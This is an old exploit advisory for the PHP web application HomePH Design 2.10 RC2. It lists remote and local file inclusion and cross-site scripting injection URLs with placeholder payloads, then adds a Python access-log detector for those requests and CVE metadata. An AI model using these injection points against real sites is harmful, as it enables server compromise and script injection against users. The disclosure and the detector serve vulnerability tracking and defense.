CraCkEr
THE CRACK OF ETERNAL MIGHT
From The Ashes and Dust Rises An Unimaginable crack....

[ Remote File Include ] [ Local File Include ] [XSS]

Author   : CraCkEr
Group    : uNiTeD CraCkiNg ForCE
Script   : HomePH Design 2.10 RC2
Download : SourceForge.net
Method   : GET
Critical : High
Impact   : System access
Register Globals : [x] ON [ ] OFF
DALnet #crackers

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Exploit URLs

[RFI]
http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[SHELL]
[LFI]
http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[LFI]
http://localhost/path/admin/features/account/account.php?language=[LFI]
http://localhost/path/admin/features/downloads/downloads.php?language=[LFI]
http://localhost/path/admin/features/forum/forum.php?language=[LFI]
http://localhost/path/admin/features/fotogalerie/delete.php?language=[LFI]
http://localhost/path/admin/features/fotogalerie/fotogalerie.php?language=[LFI]
[XSS]
http://localhost/path/admin/features/register/register.php?error_meldung=[XSS]
http://localhost/path/admin/features/memberlist/memberlist.php?feature_language[ueberschrift]=[XSS]
http://localhost/path/admin/features/lostpassword/lostpassword.php?language_array[ueberschrift]=[XSS]
http://localhost/path/admin/features/kalender/eingabe.php?language_feature[titel]=[XSS]
http://localhost/path/admin/features/fotogalerie/eingabe.php?language_feature[bildmenu]=[XSS]
Notes: More files are affected.

Greets:
The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS

© CraCkEr 2008
# milw0rm.com [2008-06-22]
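
A detection sketch for the endpoints listed above, added here as an example and not part of the original advisory: it flags access-log requests that set the advisory's parameters on the advisory's scripts. The Apache combined log format, the verdict names and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

WATCHED = {  # script paths and parameter names are the advisory's
    "/admin/templates/template_thumbnail.php": ("thumb_template", "include"),
    "/admin/features/account/account.php": ("language", "include"),
    "/admin/features/downloads/downloads.php": ("language", "include"),
    "/admin/features/forum/forum.php": ("language", "include"),
    "/admin/features/fotogalerie/delete.php": ("language", "include"),
    "/admin/features/fotogalerie/fotogalerie.php": ("language", "include"),
    "/admin/features/register/register.php": ("error_meldung", "output"),
    "/admin/features/memberlist/memberlist.php": ("feature_language", "output"),
    "/admin/features/lostpassword/lostpassword.php": ("language_array", "output"),
    "/admin/features/kalender/eingabe.php": ("language_feature", "output"),
    "/admin/features/fotogalerie/eingabe.php": ("language_feature", "output"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)
MARKUP = re.compile(r"[<>\"']")

def classify(line):
    """Return 'RFI', 'LFI', 'XSS', 'OVERRIDE' or None for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    for suffix, (param, kind) in WATCHED.items():
        if not url.path.endswith(suffix):
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):  # percent-decodes
            if key.split("[", 1)[0] != param:  # language_feature[titel] -> language_feature
                continue
            if kind == "include" and REMOTE.match(value):
                return "RFI"
            if kind == "include" and (".." in value or value.startswith("/") or "\x00" in value):
                return "LFI"
            if kind == "output" and MARKUP.search(value):
                return "XSS"
            return "OVERRIDE"  # assumed verdict: client set a variable the script treats as internal
    return None

PREFIX = '192.0.2.10 - - [22/Jun/2008:10:00:01 +0000] "GET /path/admin/'
SAMPLE_LOG = [  # constructed lines with harmless values
    PREFIX + 'features/forum/forum.php?language=..%2F..%2Fx HTTP/1.1" 200 512',
    PREFIX + 'templates/template_thumbnail.php?thumb_template=http://example.invalid/t.txt HTTP/1.1" 200 90',
    PREFIX + 'features/register/register.php?error_meldung=%3Cb%3Ehi%3C%2Fb%3E HTTP/1.1" 200 300',
    PREFIX + 'features/memberlist/memberlist.php?feature_language[ueberschrift]=Members HTTP/1.1" 200 300',
    PREFIX + 'index.php?language=de HTTP/1.1" 200 1200',
]
VERDICTS = [classify(line) for line in SAMPLE_LOG]
```

With register_globals disabled these requests no longer reach the scripts' variables, but the same log lines still show who probed for the issue.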
{"id": "EDB-ID:5903", "hash": "4eb30e93de9a659ba571325a44e94dc2", "type": "exploitdb", "bulletinFamily": "exploit", "title": "HomePH Design 2.10 RC2 RFI/LFI/XSS Multiple Vulnerabilities", "description": "HomePH Design 2.10 RC2 (RFI/LFI/XSS) Multiple Vulnerabilities. CVE-2008-2980,CVE-2008-2981,CVE-2008-2982. Webapps exploit for php platform", "published": "2008-06-22T00:00:00", "modified": "2008-06-22T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5903/", "reporter": "CraCkEr", "references": [], "cvelist": ["CVE-2008-2982", "CVE-2008-2981", "CVE-2008-2980"], "lastseen": "2016-01-31T23:47:24", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-2982", "CVE-2008-2980", "CVE-2008-2981"]}], "modified": "2016-01-31T23:47:24"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5903/", "osvdbidlist": ["46901", "46891", "46899", "46898", "46894", "46892", "46900", "46895", "46864", "46893", "46897", "46896"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-09-29T14:25:58", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in HomePH Design 2.10 RC2 allow remote attackers to inject arbitrary web script or HTML via the (1) error_meldung parameter to admin/features/register/register.php, the (2) feature_language[ueberschrift] parameter to admin/features/memberlist/memberlist.php, the (3) language_array[ueberschrift] parameter to admin/features/lostpassword/lostpassword.php, the (4) language_feature[titel] parameter to admin/features/kalender/eingabe.php, and the (5) language_feature[bildmenu] parameter to admin/features/fotogalerie/eingabe.php.", "modified": "2017-09-28T21:31:27", "published": "2008-07-02T13:14:00", "id": "CVE-2008-2980", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2980", "title": "CVE-2008-2980", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-09-29T14:25:58", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in admin/templates/template_thumbnail.php in HomePH Design 2.10 RC2, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the thumb_template parameter.", "modified": "2017-09-28T21:31:27", "published": "2008-07-02T13:14:00", "id": "CVE-2008-2981", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2981", "title": "CVE-2008-2981", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-29T14:25:58", "bulletinFamily": "NVD", "description": "Multiple directory traversal vulnerabilities in HomePH Design 2.10 RC2, when register_globals is enabled, allow remote attackers to include and execute arbitrary local files via directory traversal sequences in the (1) thumb_template parameter to (a) admin/templates/template_thumbnail.php, and the (2) language parameter to (b) account/account.php, (c) downloads/downloads.php, (d) forum/forum.php, (e) fotogalerie/delete.php, and (f) fotogalerie/fotogalerie.php in admin/features/.", "modified": "2017-09-28T21:31:27", "published": "2008-07-02T13:14:00", "id": "CVE-2008-2982", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2982", "title": "CVE-2008-2982", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}